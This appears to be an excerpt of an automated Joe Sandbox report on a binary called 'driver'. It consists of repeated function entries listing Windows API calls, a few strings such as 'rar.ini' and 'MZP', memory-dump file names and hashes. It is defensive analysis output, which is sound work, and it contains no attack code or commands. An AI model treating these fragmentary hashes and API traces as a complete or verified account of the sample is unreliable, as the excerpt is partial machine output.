                                                                                                                                                                    • Instruction ID: 9c4ee07e14ac14f2608d98d1a4f5854d44976b8054b3719d9adab0c709738835
                                                                                                                                                                    • Opcode Fuzzy Hash: 11376d7a33d08bc2bfa767998202ab47ade2a2b017e6dd4751b90cc36154d971
                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0F431704100AFEB00DE388D82BAB7699DB84721F1486BAB840D73C5E678DE0146A6
                                                                                                                                                                    Function 0043AB1C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,003FFFFF,00002000,00000001,00446B0C,?,02D00000,0043B17C), ref: 0043AB6C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID: MZP
                                                                                                                                                                    • API String ID: 4275171209-2889622443
                                                                                                                                                                    • Opcode ID: 754de35655b3e15654bd3327c640f4479d648ee259ffaf2efcab5972d7b19eb9
                                                                                                                                                                    • Instruction ID: 5661cc52af0ad36c5f8d8b9db08dede1707706c0d89bfd98c9347a1cbd9cd8be
                                                                                                                                                                    • Opcode Fuzzy Hash: 754de35655b3e15654bd3327c640f4479d648ee259ffaf2efcab5972d7b19eb9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FF024B53806005BE3204F46ACC5726B257E38B355F20D237E6C5A7A90C3BA9C418B0B
                                                                                                                                                                    Function 00404720 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,?,00000000,00403F35,?,00000000,00451DB0,?,00000000,00402070), ref: 0040473E
                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,00000000,?,00000000,00403F35,?,00000000,00451DB0,?,00000000,00402070), ref: 0040474F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$Version
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3849939888-0
                                                                                                                                                                    • Opcode ID: ddd78364e22827f1880f497a421faf7b19991191fc85f0ebfe4e0ba9cb257685
                                                                                                                                                                    • Instruction ID: f6a68b3889e0922675d7a63e0bec97ac7d17f77324af39b1d98f91e087e3f170
                                                                                                                                                                    • Opcode Fuzzy Hash: ddd78364e22827f1880f497a421faf7b19991191fc85f0ebfe4e0ba9cb257685
                                                                                                                                                                    • Instruction Fuzzy Hash: 64E0866230121192E73135774CC6AAB45CD9CC3679B084077BA14F31D2DB6CCC415079
                                                                                                                                                                    Function 00404404 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,00000000,00402061), ref: 0040441E
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,00000000,00402061), ref: 00404430
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$Version
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3849939888-0
                                                                                                                                                                    • Opcode ID: 91b1716168928fa41e4c3786cab79401491c765b77daace33f225c14cde02e1b
                                                                                                                                                                    • Instruction ID: bf6e4e78f20791458c3d47c0fee9d3ee4afcdf3bffddaa71d528b44eaca1b01f
                                                                                                                                                                    • Opcode Fuzzy Hash: 91b1716168928fa41e4c3786cab79401491c765b77daace33f225c14cde02e1b
                                                                                                                                                                    • Instruction Fuzzy Hash: EBE08CB3220A1182AA2029B90DC228B11989D852727584377EA20E21C2EB6DC9866069
                                                                                                                                                                    Function 0041ADF8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0041AE05
                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,?), ref: 0041AE0B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                                                    • Opcode ID: e7615505019735664bafd06f317b0eb60236aee48204dc75a8fe7fe3f33292ab
                                                                                                                                                                    • Instruction ID: 262fd4f24ab6656c4bbd16548e5ffc2149fa4158210067f9a139f60b9622648e
                                                                                                                                                                    • Opcode Fuzzy Hash: e7615505019735664bafd06f317b0eb60236aee48204dc75a8fe7fe3f33292ab
                                                                                                                                                                    • Instruction Fuzzy Hash: B7E08672349B0115F70499299D4279B63D88BC0765F148A3BF844C5284FF2DDD92A119
                                                                                                                                                                    Function 004046F4 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,004041B9), ref: 0040470E
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,004041B9), ref: 00404717
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$Version
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3849939888-0
                                                                                                                                                                    • Opcode ID: 565f813c40ff20afc569fe12a403d535cc547af31fd50c6f80e9310e0f3a0e10
                                                                                                                                                                    • Instruction ID: 6d6f70c5243012630dcda667dd67d3c8a650278ed0f1b033fc1de19fc6c0fb16
                                                                                                                                                                    • Opcode Fuzzy Hash: 565f813c40ff20afc569fe12a403d535cc547af31fd50c6f80e9310e0f3a0e10
                                                                                                                                                                    • Instruction Fuzzy Hash: 89D0C79260122113EB317EEE18C15D7429D4ED67967044177FE00E72E3DB7C8D8491A9
                                                                                                                                                                    Function 00412ED0 Relevance: 3.0, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %s%c%s$System Volume Information\
                                                                                                                                                                    • API String ID: 0-1332662115
                                                                                                                                                                    • Opcode ID: 73db5d809de157e4eee187ec79a837bbf9331f142671404af82c116ee763727b
                                                                                                                                                                    • Instruction ID: e3e0b6aff62becdbdef1645db206b1c63ea33cb9603f4bc20d13fb07fcb3e2d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 73db5d809de157e4eee187ec79a837bbf9331f142671404af82c116ee763727b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4012C87060060ABAE725EF31C945BD6F7A4BF01309F04827BD45993282DB786BD9CBD9
                                                                                                                                                                    Function 0042C6FC Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: rar.ini$switches=
                                                                                                                                                                    • API String ID: 0-2952858923
                                                                                                                                                                    • Opcode ID: febc456425cb21283b514296de3801fd1900a0fec9148c14ecdde4304c04ae3f
                                                                                                                                                                    • Instruction ID: 8d6baae8820ff84d3c835b238240be401bf84f212183ec55cdd1807820225eb0
                                                                                                                                                                    • Opcode Fuzzy Hash: febc456425cb21283b514296de3801fd1900a0fec9148c14ecdde4304c04ae3f
                                                                                                                                                                    • Instruction Fuzzy Hash: AF01A72434062B42D720A5269C817EE73994B85358FD081B7A908AB782FF3CDD45468D
                                                                                                                                                                    Function 00404E98 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c9b9eb0f6ed3a11c0a4faf80a6fb06e004e3492111f5085dd7f3af7d1e3644c9
                                                                                                                                                                    • Instruction ID: 5705f4a1d88e40d2283ba3302c0fa8bbcdd64fcbdea2c6e292b129d580f720b0
                                                                                                                                                                    • Opcode Fuzzy Hash: c9b9eb0f6ed3a11c0a4faf80a6fb06e004e3492111f5085dd7f3af7d1e3644c9
                                                                                                                                                                    • Instruction Fuzzy Hash: B46150749001099ADF20EE65C88579FB7A5DF45308F1481BBE900B73C2D77D9E898BAA
                                                                                                                                                                    Function 00403B50 Relevance: 1.6, APIs: 1, Instructions: 85timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileTime.KERNEL32(?,00000000,00000000,00000000), ref: 00403C15
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1425588814-0
                                                                                                                                                                    • Opcode ID: 37a8c82ea8d99e6fef9e0570930fe0ddf63513a47d197e8c7653f0fd353eae33
                                                                                                                                                                    • Instruction ID: a6c4e0528c06b102bf3592dd363e27ba1f0ab591f5c515dd3e6b449e6d10106e
                                                                                                                                                                    • Opcode Fuzzy Hash: 37a8c82ea8d99e6fef9e0570930fe0ddf63513a47d197e8c7653f0fd353eae33
                                                                                                                                                                    • Instruction Fuzzy Hash: CF21D6316046049AEB14CE64C4027FEBFB9AB41309F0840BBD841B73C2D77DAF44D255
                                                                                                                                                                    Function 0042B92D Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CharToOemA.USER32(00453DB0,00453DB0), ref: 0042B992
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 751630497-0
                                                                                                                                                                    • Opcode ID: 0fc117d7aaa645549d8c52891dc8685c344a92916f472e4642585f71273bb97c
                                                                                                                                                                    • Instruction ID: 3cb7f2cd1ad1bb318c08a21bcd4c3cf6c38605d5bbdeba97254f8b7dad9adafb
                                                                                                                                                                    • Opcode Fuzzy Hash: 0fc117d7aaa645549d8c52891dc8685c344a92916f472e4642585f71273bb97c
                                                                                                                                                                    • Instruction Fuzzy Hash: C0210B6160417846E7219B355C82BA6B7DCDF0D304F5009FBE949A6743DF3C8E8446DD
                                                                                                                                                                    Function 0040F858 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0c038491901c6d3da0f9a5a51ff20dc19fdd2d4e4f347752ab7955df103a6759
                                                                                                                                                                    • Instruction ID: ddd629f78c5652066d94efcd3ea0f0718fa8aa38aa766412159702ebe21abcb4
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c038491901c6d3da0f9a5a51ff20dc19fdd2d4e4f347752ab7955df103a6759
                                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0243330814016E720AA7F5880AC7B3894F95378F188337AD28DB6D7CB7488464179
                                                                                                                                                                    Function 00438E78 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: MZP
                                                                                                                                                                    • API String ID: 0-2889622443
                                                                                                                                                                    • Opcode ID: 6a7d0674a6627098c7670a05f00a9ad5ac38b92c7590d37f6ff824465fc63817
                                                                                                                                                                    • Instruction ID: 47f9aa2faac0a463d8cdb12b842056577bd96d0129d8996c7daaa114fe268dfd
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a7d0674a6627098c7670a05f00a9ad5ac38b92c7590d37f6ff824465fc63817
                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB195706046059BDB14DF19C9C1A5B73E2AF88304F18867EEC469F386DB78EC41CB6A
                                                                                                                                                                    Function 00402114 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0040218F,?,004521B1,?,00000000,?,0042B773,?,00000000,004521B1), ref: 00402139
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 514040917-0
                                                                                                                                                                    • Opcode ID: 1ba0893bd548ca3ad52ed55ef3932f9b0d934fff37b73124ef3dc42c331e8618
                                                                                                                                                                    • Instruction ID: 9c19024145d54c886d210cc0c945b7553373d87ee7de339eb3c422cbc5fbf9ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba0893bd548ca3ad52ed55ef3932f9b0d934fff37b73124ef3dc42c331e8618
                                                                                                                                                                    • Instruction Fuzzy Hash: 49D05E7070030526E750287A0ECA72A00865BA4709F60903FF704FD2C2E9FDC816121D
                                                                                                                                                                    Function 0043C968 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                    • Opcode ID: d8dbf742682ad9581e06b7cd54e2f973d0687bf0adcbc49ae8194c0b56124f6c
                                                                                                                                                                    • Instruction ID: 98ada16339e3cf58edfbd852cf1d2c9d6fdd5a34e0de020eea7f9f028549f141
                                                                                                                                                                    • Opcode Fuzzy Hash: d8dbf742682ad9581e06b7cd54e2f973d0687bf0adcbc49ae8194c0b56124f6c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD0A7371183085BAB00DFA5FCC281A735CF6453287504112E40CC2531C636F5418568
                                                                                                                                                                    Function 0040F6FC Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindClose.KERNEL32(?,00000000,?,004044D1,00000000,00000000,?), ref: 0040F715
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
